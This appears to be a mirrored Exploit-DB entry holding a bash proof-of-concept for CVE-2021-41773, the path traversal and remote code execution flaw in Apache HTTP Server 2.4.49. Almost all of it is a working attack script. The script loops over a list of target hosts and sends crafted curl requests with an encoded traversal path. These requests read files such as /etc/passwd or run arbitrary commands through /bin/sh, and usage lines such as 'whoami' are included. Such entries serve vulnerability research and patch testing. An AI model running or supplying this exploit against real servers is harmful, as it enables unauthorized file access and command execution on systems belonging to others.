Apache HTTP Server 2.4.49 – Path Traversal & Remote Code Execution (RCE)

  • 作者: Lucas Souza
    日期: 2021-10-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50383/
  • # Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
    # Date: 10/05/2021
    # Exploit Author: Lucas Souza https://lsass.io
    # Vendor Homepage:https://apache.org/
    # Version: 2.4.49
    # Tested on: 2.4.49
    # CVE : CVE-2021-41773
    # Credits: Ash Daulton and the cPanel Security Team
    
    #!/bin/bash
    
    if [[ $1 == '' ]]; [[ $2 == '' ]]; then
    echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
    echo ./PoC.sh targets.txt /etc/passwd
    exit
    fi
    for host in $(cat $1); do
    echo $host
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
    
    # PoC.sh targets.txt /etc/passwd
    # PoC.sh targets.txt /bin/sh whoami